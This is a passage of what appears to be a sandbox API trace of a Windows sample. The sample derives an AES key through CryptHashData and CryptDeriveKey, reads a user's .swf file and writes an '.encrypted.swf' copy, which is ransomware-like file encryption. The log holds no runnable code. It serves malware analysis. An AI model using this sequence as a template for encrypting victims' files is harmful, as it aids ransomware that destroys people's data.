wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.976] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.976] CryptHashData (hHash=0x7c2240, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0030.976] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.976] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.977] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.977] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.977] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.977] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.977] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.977] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.977] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0030.977] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.977] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.977] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.977] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.977] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.977] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.977] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0030.977] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.978] CryptDestroyHash (hHash=0x7c2240) returned 1 [0030.978] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.978] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.978] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.978] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.978] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.978] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\5o5ipnmm_es0x.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0030.978] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.978] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0030.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0030.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0030.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0030.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0030.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0030.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0030.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0030.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0030.978] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0030.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0030.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0030.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0030.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0030.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0030.978] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0030.979] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0030.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0030.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0030.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0030.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0030.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0030.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0030.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0030.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0030.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0030.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0030.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0030.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0030.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0030.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0030.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0030.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0030.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0030.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0030.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0030.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0030.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0030.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c75d0 [0030.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0030.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0030.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0030.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0030.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c75d0 | out: hHeap=0x770000) returned 1 [0030.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0030.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0030.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0030.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0030.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0030.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0030.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0030.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0030.980] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni")) returned 0x10 [0030.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0030.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0030.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0030.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0030.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0030.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0030.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0030.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0030.980] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.encrypted.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\5o5ipnmm_es0x.encrypted.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0030.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0030.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0030.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0030.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0030.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0030.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0030.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0030.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0030.981] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0030.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0030.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0030.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0030.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0030.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0030.981] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0030.981] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0030.981] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0030.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0030.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0030.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0030.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0030.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0030.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0030.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0030.982] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0030.982] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0xc19f, lpOverlapped=0x0) returned 1 [0030.984] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0030.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0030.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0030.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc19f) returned 0x935008 [0030.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0030.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0030.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0030.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0030.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0030.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0030.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc19f) returned 0x9411b0 [0030.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0030.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.986] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0030.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0030.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc19f) returned 0x935008 [0030.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0030.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0030.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0030.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.986] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0030.987] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0030.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.987] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0030.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0030.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0030.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0030.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0030.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0030.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc19f) returned 0x935008 [0030.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0030.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0030.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0030.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0030.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da148 [0030.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0030.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0030.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0030.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1a8 [0030.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0030.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0030.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0030.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c838 [0030.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0030.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0030.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0030.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0030.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0030.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc19f) returned 0x94d358 [0030.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0030.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0030.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0030.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0030.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0030.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0030.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0030.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0030.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0030.989] 